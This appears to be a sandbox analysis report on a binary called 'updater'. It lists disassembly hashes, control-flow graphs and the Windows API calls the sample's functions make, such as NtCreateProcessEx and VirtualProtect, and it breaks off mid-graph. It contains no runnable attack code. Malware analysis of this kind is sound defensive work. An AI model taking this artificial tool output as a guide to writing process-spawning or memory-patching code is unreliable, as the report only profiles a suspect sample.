                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                          • String ID:
                                          • API String ID: 3326252324-0
                                          • Opcode ID: fd209cddb1df165fe120bb66cf544e8d6e83d75e697be01662b719c901dee52c
                                          • Instruction ID: 52c740b10f4de79b754b82f96fc44a56dedb1d5128c9d5d68308f1309cae0ec2
                                          • Opcode Fuzzy Hash: fd209cddb1df165fe120bb66cf544e8d6e83d75e697be01662b719c901dee52c
                                          • Instruction Fuzzy Hash: 8321EA60A1D51382FE2A9B41E9603746360BF15B90F5C0031C91DEB6A8DF6FBD56C320
                                          Function 00007FF6568E1E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 307 7ff6568e1e10-7ff6568e1e2d 308 7ff6568e1e2f-7ff6568e1e38 307->308 309 7ff6568e1e3e-7ff6568e1e48 307->309 308->309 310 7ff6568e1f60-7ff6568e1f69 308->310 311 7ff6568e1ea3-7ff6568e1ea8 309->311 312 7ff6568e1e4a-7ff6568e1e53 309->312 311->310 315 7ff6568e1eae-7ff6568e1eb3 311->315 313 7ff6568e1e55-7ff6568e1e60 312->313 314 7ff6568e1ecc-7ff6568e1ed1 312->314 313->311 318 7ff6568e1f23-7ff6568e1f2d 314->318 319 7ff6568e1ed3-7ff6568e1ee2 signal 314->319 316 7ff6568e1eb5-7ff6568e1eba 315->316 317 7ff6568e1efb-7ff6568e1f0a call 7ff6568e9f80 315->317 316->310 322 7ff6568e1ec0 316->322 317->318 329 7ff6568e1f0c-7ff6568e1f10 317->329 320 7ff6568e1f43-7ff6568e1f45 318->320 321 7ff6568e1f2f-7ff6568e1f3f 318->321 319->318 323 7ff6568e1ee4-7ff6568e1ee8 319->323 320->310 321->320 322->318 325 7ff6568e1f4e-7ff6568e1f53 323->325 326 7ff6568e1eea-7ff6568e1ef9 signal 323->326 328 7ff6568e1f5a 325->328 326->310 328->310 330 7ff6568e1f12-7ff6568e1f21 signal 329->330 331 7ff6568e1f55 329->331 330->310 331->328
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CCG
                                          • API String ID: 0-1584390748
                                          • Opcode ID: a19b5ea743c64a015226f88ea68dd99b9d0cf90ba8dc366ff5ce5a6acfb792c5
                                          • Instruction ID: a770661c58c62cc81d5ced8608b760b5ce212888825e35231af4ea3e6d23dc37
                                          • Opcode Fuzzy Hash: a19b5ea743c64a015226f88ea68dd99b9d0cf90ba8dc366ff5ce5a6acfb792c5
                                          • Instruction Fuzzy Hash: CB21A432F0C50741FE755214959037911819F857A4F2D8531E99DEF3D8DEAEFC81C2A0
                                          Function 00007FF6568E38F0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: wcslen
                                          • String ID: 0$@
                                          • API String ID: 4088430540-1545510068
                                          • Opcode ID: bba2083c9aafad6c564e99380eb9ae7bf51f5fbee20126f4752a7ce338e2db8c
                                          • Instruction ID: 7c49780f636fe9f230568af43c4ef52cfa10170ffbc8dddb34fcbda5dc8b7a8f
                                          • Opcode Fuzzy Hash: bba2083c9aafad6c564e99380eb9ae7bf51f5fbee20126f4752a7ce338e2db8c
                                          • Instruction Fuzzy Hash: B2119A2252868182E720DB14F44679AA3B4FFD43A4F140124FA8C87BA8EF7ED54ACB40
                                          Function 00007FF6568E1880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 340 7ff6568e1880-7ff6568e189c 341 7ff6568e18a2-7ff6568e18f9 call 7ff6568e2420 call 7ff6568e2660 340->341 342 7ff6568e1a0f-7ff6568e1a1f 340->342 341->342 347 7ff6568e18ff-7ff6568e1910 341->347 348 7ff6568e1912-7ff6568e191c 347->348 349 7ff6568e193e-7ff6568e1941 347->349 350 7ff6568e191e-7ff6568e1929 348->350 351 7ff6568e194d-7ff6568e1954 348->351 349->351 352 7ff6568e1943-7ff6568e1947 349->352 350->351 353 7ff6568e192b-7ff6568e193a 350->353 355 7ff6568e199e-7ff6568e19a6 351->355 356 7ff6568e1956-7ff6568e1961 351->356 352->351 354 7ff6568e1a20-7ff6568e1a26 352->354 353->349 358 7ff6568e1a2c-7ff6568e1a37 354->358 359 7ff6568e1b87-7ff6568e1b98 call 7ff6568e1d40 354->359 355->342 357 7ff6568e19a8-7ff6568e19c1 355->357 360 7ff6568e1970-7ff6568e199c call 7ff6568e1ba0 356->360 361 7ff6568e19df-7ff6568e19e7 357->361 358->355 362 7ff6568e1a3d-7ff6568e1a5f 358->362 360->355 365 7ff6568e19d0-7ff6568e19dd 361->365 366 7ff6568e19e9-7ff6568e1a0d VirtualProtect 361->366 367 7ff6568e1a7d-7ff6568e1a97 362->367 365->342 365->361 366->365 370 7ff6568e1b74-7ff6568e1b82 call 7ff6568e1d40 367->370 371 7ff6568e1a9d-7ff6568e1afa 367->371 370->359 377 7ff6568e1b22-7ff6568e1b26 371->377 378 7ff6568e1afc-7ff6568e1b0e 371->378 381 7ff6568e1a70-7ff6568e1a77 377->381 382 7ff6568e1b2c-7ff6568e1b30 377->382 379 7ff6568e1b10-7ff6568e1b20 378->379 380 7ff6568e1b5c-7ff6568e1b6c 378->380 379->377 379->380 380->370 384 7ff6568e1b6f call 7ff6568e1d40 380->384 381->355 381->367 382->381 383 7ff6568e1b36-7ff6568e1b53 call 7ff6568e1ba0 382->383 387 7ff6568e1b57 383->387 384->370 387->387
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6568E1247), ref: 00007FF6568E19F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                          • API String ID: 544645111-395989641
                                          • Opcode ID: a96b84c6a29362a5831d93957ea7165e458f8b3424253329cfa7517644b3fa32
                                          • Instruction ID: b6dff9bd2314197a495dd6e8e2774d8dad8fb5961132f1e6b7fe6a57cdbb4662
                                          • Opcode Fuzzy Hash: a96b84c6a29362a5831d93957ea7165e458f8b3424253329cfa7517644b3fa32
                                          • Instruction Fuzzy Hash: 66516C62F18547C6EB109B22D8807B827A1EB15B98F5C4131D95CAF798CF3EEC96C720
                                          Function 00007FF6568E1800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 388 7ff6568e1800-7ff6568e1810 389 7ff6568e1812-7ff6568e1822 388->389 390 7ff6568e1824 388->390 391 7ff6568e182b-7ff6568e1867 call 7ff6568e2290 fprintf 389->391 390->391
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: fprintf
                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                          • API String ID: 383729395-3474627141
                                          • Opcode ID: 6dbf5a7c010a93ffdc521eff69b8f13d2c87c304966384c1bf5507061ee5eef1
                                          • Instruction ID: 4d3e76a9d9829752076873053f93892e85892f41d57b59e0b68bbaf2f2510f08
                                          • Opcode Fuzzy Hash: 6dbf5a7c010a93ffdc521eff69b8f13d2c87c304966384c1bf5507061ee5eef1
                                          • Instruction Fuzzy Hash: 4FF0F611E18A8682E620DB64E9410BDA360FB597C1F489231EE8EFF251DF2DF982C310
                                          Function 00007FF6568E219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.345267429688.00007FF6568E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6568E0000, based on PE: true
                                          • Associated: 00000000.00000002.345267377238.00007FF6568E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267488717.00007FF6568EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267530713.00007FF6568ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345267570809.00007FF6568EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268353464.00007FF656B6A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268401508.00007FF656B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.345268444760.00007FF656B7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff6568e0000_updater.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                          • String ID:
                                          • API String ID: 682475483-0
                                          • Opcode ID: 2528049f67c3bbc59b914fdf468fc705937388fb34f79aa992765da7661b039a
                                          • Instruction ID: 97bf343ee977f8340ed42ab72c6d11a962ee5a0df3538e539a26f8d6a99efbdb
                                          • Opcode Fuzzy Hash: 2528049f67c3bbc59b914fdf468fc705937388fb34f79aa992765da7661b039a
                                          • Instruction Fuzzy Hash: DF01EC25B0D60382FA269B51EE142746360BF15B91F5C0035CA1DEB6A4DF2FBD96C310

                                          Execution Graph

                                          Execution Coverage:5%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:189
                                          Total number of Limit Nodes:2
                                          execution_graph 1148 7ff758ee1394 1152 7ff758ee99e0 1148->1152 1150 7ff758ee13b8 1151 7ff758ee13c6 NtCreateProcessEx 1150->1151 1153 7ff758ee99fe 1152->1153 1156 7ff758ee9a2b 1152->1156 1153->1150 1154 7ff758ee9ad3 1155 7ff758ee9aef malloc 1154->1155 1157 7ff758ee9b10 1155->1157 1156->1153 1156->1154 1157->1153 1260 7ff758ee1ad4 1261 7ff758ee1a70 1260->1261 1262 7ff758ee1b36 1261->1262 1265 7ff758ee199e 1261->1265 1268 7ff758ee1b5c 1261->1268 1263 7ff758ee1ba0 4 API calls 1262->1263 1266 7ff758ee1b53 1263->1266 1264 7ff758ee1a0f 1265->1264 1267 7ff758ee19e9 VirtualProtect 1265->1267 1267->1265 1194 7ff758ee1e10 1195 7ff758ee1e2f 1194->1195 1196 7ff758ee1eb5 1195->1196 1197 7ff758ee1ecc 1195->1197 1200 7ff758ee1e55 1195->1200 1197->1196 1198 7ff758ee1ed3 signal 1197->1198 1198->1196 1199 7ff758ee1ee4 1198->1199 1199->1196 1201 7ff758ee1eea signal 1199->1201 1200->1196 1202 7ff758ee1f12 signal 1200->1202 1201->1196 1202->1196 1271 7ff758ee1fd0 1272 7ff758ee1fe4 1271->1272 1273 7ff758ee2033 1271->1273 1272->1273 1274 7ff758ee1ffd EnterCriticalSection LeaveCriticalSection 1272->1274 1274->1273 1455 7ff758ee2050 1456 7ff758ee20cf 1455->1456 1457 7ff758ee205e EnterCriticalSection 1455->1457 1458 7ff758ee20c2 LeaveCriticalSection 1457->1458 1459 7ff758ee2079 1457->1459 1458->1456 1459->1458 1460 7ff758ee20bd free 1459->1460 1460->1458 1203 7ff758ee6a0f wcslen 1208 7ff758ee15a8 1203->1208 1210 7ff758ee1394 1208->1210 1211 7ff758ee99e0 malloc 1210->1211 1212 7ff758ee13b8 1211->1212 1213 7ff758ee13c6 NtCreateProcessEx 1212->1213 1299 7ff758ee118b 1300 7ff758ee1190 1299->1300 1301 7ff758ee11b9 _amsg_exit 1299->1301 1300->1301 1303 7ff758ee11a0 Sleep 1300->1303 1304 7ff758ee11fa 1301->1304 1303->1300 1303->1301 1305 7ff758ee1201 _initterm 1304->1305 1306 7ff758ee121a 1304->1306 1305->1306 1307 7ff758ee1880 5 API calls 1306->1307 1308 7ff758ee1247 SetUnhandledExceptionFilter 1307->1308 1309 7ff758ee126a 1308->1309 1310 7ff758ee126f malloc 1309->1310 1311 7ff758ee128b 1310->1311 1312 7ff758ee12a0 strlen malloc memcpy 1311->1312 1312->1312 1313 7ff758ee12d0 1312->1313 1314 7ff758ee132d _cexit 1313->1314 1315 7ff758ee1338 1313->1315 1314->1315 1316 7ff758ee2f88 1319 7ff758ee14a9 1316->1319 1320 7ff758ee1394 2 API calls 1319->1320 1461 7ff758ee1f47 1462 7ff758ee1e67 signal 1461->1462 1464 7ff758ee1e99 1461->1464 1463 7ff758ee1e7c 1462->1463 1462->1464 1463->1464 1465 7ff758ee1e82 signal 1463->1465 1465->1464 1214 7ff758ee1404 1215 7ff758ee1394 2 API calls 1214->1215 1216 7ff758ee1413 1215->1216 1217 7ff758ee1394 2 API calls 1216->1217 1218 7ff758ee2104 1219 7ff758ee2111 EnterCriticalSection 1218->1219 1221 7ff758ee2218 1218->1221 1220 7ff758ee220b LeaveCriticalSection 1219->1220 1226 7ff758ee212e 1219->1226 1220->1221 1222 7ff758ee2272 1221->1222 1224 7ff758ee2241 DeleteCriticalSection 1221->1224 1225 7ff758ee2230 free 1221->1225 1223 7ff758ee214d TlsGetValue GetLastError 1223->1226 1224->1222 1225->1224 1225->1225 1226->1220 1226->1223 1275 7ff758ee1ac3 1276 7ff758ee1a70 1275->1276 1277 7ff758ee1b5c 1276->1277 1278 7ff758ee1b36 1276->1278 1281 7ff758ee199e 1276->1281 1279 7ff758ee1ba0 4 API calls 1278->1279 1283 7ff758ee1b53 1279->1283 1280 7ff758ee1a0f 1281->1280 1282 7ff758ee19e9 VirtualProtect 1281->1282 1282->1281 1283->1283 1325 7ff758ee6586 1330 7ff758ee2df0 1325->1330 1342 7ff758ee2660 1330->1342 1332 7ff758ee2e00 memset 1333 7ff758ee2e3c 1332->1333 1344 7ff758ee2690 1333->1344 1343 7ff758ee266f 1342->1343 1343->1332 1343->1343 1379 7ff758ee155d 1344->1379 1380 7ff758ee1394 2 API calls 1379->1380 1227 7ff758ee1000 1228 7ff758ee108b __set_app_type 1227->1228 1229 7ff758ee1040 1227->1229 1231 7ff758ee10b6 1228->1231 1229->1228 1230 7ff758ee10e5 1231->1230 1233 7ff758ee1e00 1231->1233 1234 7ff758ee9f70 __setusermatherr 1233->1234 1235 7ff758ee1800 1236 7ff758ee1812 1235->1236 1237 7ff758ee1835 fprintf 1236->1237 1381 7ff758ee6779 1382 7ff758ee6786 1381->1382 1383 7ff758ee6820 wcslen 1381->1383 1382->1383 1430 7ff758ee153f 1383->1430 1431 7ff758ee1394 2 API calls 1430->1431 1432 7ff758ee154e 1431->1432 1433 7ff758ee1394 2 API calls 1432->1433 1284 7ff758ee1ab3 1285 7ff758ee1a70 1284->1285 1285->1284 1286 7ff758ee1b36 1285->1286 1287 7ff758ee199e 1285->1287 1292 7ff758ee1b5c 1285->1292 1288 7ff758ee1ba0 4 API calls 1286->1288 1289 7ff758ee1a0f 1287->1289 1291 7ff758ee19e9 VirtualProtect 1287->1291 1290 7ff758ee1b53 1288->1290 1291->1287 1238 7ff758ee38f0 wcslen 1246 7ff758ee157b 1238->1246 1247 7ff758ee1394 2 API calls 1246->1247 1434 7ff758ee1a70 1435 7ff758ee199e 1434->1435 1439 7ff758ee1a7d 1434->1439 1436 7ff758ee1a0f 1435->1436 1437 7ff758ee19e9 VirtualProtect 1435->1437 1437->1435 1438 7ff758ee1b5c 1439->1434 1439->1438 1440 7ff758ee1b36 1439->1440 1441 7ff758ee1ba0 4 API calls 1440->1441 1442 7ff758ee1b53 1441->1442 1443 7ff758ee216f 1444 7ff758ee2185 1443->1444 1445 7ff758ee2178 InitializeCriticalSection 1443->1445 1445->1444 1448 7ff758ee146d 1449 7ff758ee1394 2 API calls 1448->1449 1248 7ff758ee15e4 1249 7ff758ee1394 2 API calls 1248->1249 1250 7ff758ee15f3 1249->1250 1450 7ff758ee1e65 1451 7ff758ee1e67 signal 1450->1451 1452 7ff758ee1e7c 1451->1452 1454 7ff758ee1e99 1451->1454 1453 7ff758ee1e82 signal 1452->1453 1452->1454 1453->1454 1472 7ff758ee2320 strlen 1473 7ff758ee2337 1472->1473 1293 7ff758ee219e 1294 7ff758ee2272 1293->1294 1295 7ff758ee21ab EnterCriticalSection 1293->1295 1296 7ff758ee2265 LeaveCriticalSection 1295->1296 1297 7ff758ee21c8 1295->1297 1296->1294 1297->1296 1298 7ff758ee21e9 TlsGetValue GetLastError 1297->1298 1298->1297 1158 7ff758ee11d8 1159 7ff758ee11fa 1158->1159 1160 7ff758ee1201 _initterm 1159->1160 1161 7ff758ee121a 1159->1161 1160->1161 1171 7ff758ee1880 1161->1171 1164 7ff758ee126a 1165 7ff758ee126f malloc 1164->1165 1166 7ff758ee128b 1165->1166 1167 7ff758ee12a0 strlen malloc memcpy 1166->1167 1167->1167 1168 7ff758ee12d0 1167->1168 1169 7ff758ee132d _cexit 1168->1169 1170 7ff758ee1338 1168->1170 1169->1170 1172 7ff758ee1247 SetUnhandledExceptionFilter 1171->1172 1173 7ff758ee18a2 1171->1173 1172->1164 1173->1172 1174 7ff758ee194d 1173->1174 1179 7ff758ee1a20 1173->1179 1175 7ff758ee1956 1174->1175 1176 7ff758ee199e 1174->1176 1175->1176 1184 7ff758ee1ba0 1175->1184 1176->1172 1178 7ff758ee19e9 VirtualProtect 1176->1178 1178->1176 1179->1176 1180 7ff758ee1b5c 1179->1180 1181 7ff758ee1b36 1179->1181 1182 7ff758ee1ba0 4 API calls 1181->1182 1183 7ff758ee1b53 1182->1183 1185 7ff758ee1bc2 1184->1185 1187 7ff758ee1c45 VirtualQuery 1185->1187 1188 7ff758ee1cf4 1185->1188 1192 7ff758ee1c04 memcpy 1185->1192 1187->1188 1193 7ff758ee1c72 1187->1193 1189 7ff758ee1d23 GetLastError 1188->1189 1191 7ff758ee1d37 1189->1191 1190 7ff758ee1ca4 VirtualProtect 1190->1189 1190->1192 1192->1175 1193->1190 1193->1192

                                          Executed Functions

                                          Function 00007FF758EE118B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108sleepstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                          • String ID: &
                                          • API String ID: 2643109117-1499360005
                                          • Opcode ID: a143279de87784c29542b8cb12405773007f83f22a7bc91e9d7b56bbb9964d85
                                          • Instruction ID: 6779d160945330fb0f0576d1f307988473e9cc7e184e70d4f1ac8f496929340a
                                          • Opcode Fuzzy Hash: a143279de87784c29542b8cb12405773007f83f22a7bc91e9d7b56bbb9964d85
                                          • Instruction Fuzzy Hash: 14414C75E0966282FA10BF15E951379E7B1AF49781FDC403ACA0D4B7A1DF3CA491C328
                                          Function 00007FF758EE1394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • NtCreateProcessEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF758EE1156), ref: 00007FF758EE13F7
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.345290631624.00007FF758EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF758EE0000, based on PE: true
                                          • Associated: 00000024.00000002.345290597107.00007FF758EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290666328.00007FF758EEA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345290696586.00007FF758EED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291208598.00007FF75916C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF759170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000024.00000002.345291242321.00007FF75917F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ff758ee0000_updater.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 1d3dcb4b41951578468dfebce8a3b5ee3b4e38d1bfb761ac12e8c11205364101
                                          • Instruction ID: 5045e4ece0a1220cac7bbaa1a7439c99ce53f3fd2f625b4613ba6f20e5ecad7b
                                          • Opcode Fuzzy Hash: 1d3dcb4b41951578468dfebce8a3b5ee3b4e38d1bfb761ac12e8c11205364101
                                          • Instruction Fuzzy Hash: DCF0C971A0CB5597D610EB55F84113AF7B2FB49380B48483AE98C43729CF3CE151CB68

                                          Non-executed Functions

                                          Function 00007FF758EE6779 Relevance: 38.9, APIs: 17, Strings: 5, Instructions: 443COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 42 7ff758ee6779-7ff758ee6780 43 7ff758ee6786-7ff758ee6819 42->43 44 7ff758ee6820-7ff758ee68be wcslen call 7ff758ee153f call 7ff758ee145e 42->44 43->44 49 7ff758ee68c4-7ff758ee68cb 44->49 50 7ff758ee6948-7ff758ee695c 44->50 49->50 52 7ff758ee68cd-7ff758ee693e call 7ff758ee2f70 call 7ff758ee39c0 call 7ff758ee14c7 49->52 53 7ff758ee69a5-7ff758ee69ca wcslen 50->53 54 7ff758ee695e-7ff758ee699e 50->54 52->50 70 7ff758ee6940-7ff758ee6943 call 7ff758ee145e 52->70 59 7ff758ee69d0-7ff758ee69e0 _wcsnicmp 53->59 54->53 61 7ff758ee69e6-7ff758ee69fa wcslen 59->61 62 7ff758ee6aec 59->62 61->59 65 7ff758ee69fc 61->65 63 7ff758ee6af0-7ff758ee6b04 62->63 68 7ff758ee6b06-7ff758ee6b62 63->68 69 7ff758ee6b69-7ff758ee6c21 memset wcscpy wcscat call 7ff758ee2f70 call 7ff758ee3350 call 7ff758ee14c7 memset 63->69 65->63 68->69 78 7ff758ee7fbc-7ff758ee7ffe call 7ff758ee1370 69->78 79 7ff758ee6c27-7ff758ee6c2e 69->79 70->50 81 7ff758ee6c30-7ff758ee6c70 78->81 87 7ff758ee8004 78->87 79->81 82 7ff758ee6c77-7ff758ee6c87 wcslen 79->82 81->82 84 7ff758ee6cc9-7ff758ee6ccb 82->84 85 7ff758ee6c89-7ff758ee6c95 82->85 86 7ff758ee6cd1-7ff758ee6cfb wcscat memset 84->86 88 7ff758ee6ca0-7ff758ee6cb0 _wcsnicmp 85->88 89 7ff758ee6d01-7ff758ee6d08 86->89 90 7ff758ee8009-7ff758ee8054 call 7ff758ee1370 86->90 87->82 91 7ff758ee6cb2-7ff758ee6cc5 wcslen 88->91 92 7ff758ee6ccd 88->92 94 7ff758ee6d64-7ff758ee6d93 wcscpy wcscat 89->94 95 